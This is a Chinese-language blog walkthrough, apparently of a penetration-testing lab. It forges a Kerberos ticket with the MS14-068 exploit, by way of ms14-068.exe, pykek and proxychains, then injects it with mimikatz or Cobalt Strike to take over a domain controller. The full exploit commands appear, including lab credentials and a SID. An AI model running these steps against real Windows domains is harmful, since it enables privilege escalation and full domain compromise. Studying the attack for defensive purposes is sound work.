ms14-068提权域控

msf ms14-068 提权域控

上传ms14-068.exe到目标主机的目录上

upload /root/wwwhack23/ms14-068.exe C:/phpstudy_pro/www/www/www.webhack123.com/ms14-068.exe

在这里插入图片描述
这些信息从metasploit 前期信息来的,可以翻到上面查看

ms14-068.exe -u web@hackbox.com -s S-1-5-21-2005268815-658469957-1189185684-1103 -d 10.10.10.149 -p !@#Qwe456

这里控制的主机必须要能够和10.10.10.149通信,
ms14-068.exe -u 域成员名@域名 -s 域成员sid -d 域控制器ip地址 -p 域成员密码
在这里插入图片描述
在这里插入图片描述

上传mimikatz到目标主机
在这里插入图片描述
运行查看票据
在这里插入图片描述
先清除所有票据
在这里插入图片描述
查看票据,刚刚使用命令已经将全部的票据清除,此时使用mimkatz注入票据kerberos::ptc TGT_web@hackbox.com.ccache
在这里插入图片描述
查看票据,可以知道刚刚注入的票据成功了
在这里插入图片描述
此时能够成功访问域控在这里插入图片描述

cobaltstrike ms14-068 提权到域控

root@kali:~/Desktop/webhack123/pykek# set +H

root@kali:~/Desktop/webhack123/pykek# proxychains python ms14-068.py -u web@hackbox.com -s S-1-5-21-2005268815-658469957-1189185684-1103 -d 10.10.10.149 -p !@#Qwe456

这里为什么要添加proxychains,因为我们在创建票据的时候无法访问10.10.10.149,所以要使用代理
在这里插入图片描述
KrbCredExport 将 .ccache 文件转化为 kirbi 格式 python KrbCredExport.py …/pykek/TGT_web@hackbox.com.ccache user.ticket
在这里插入图片描述
导入票据 kerberos_ticket_use C:\user.ticket

在这里插入图片描述

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值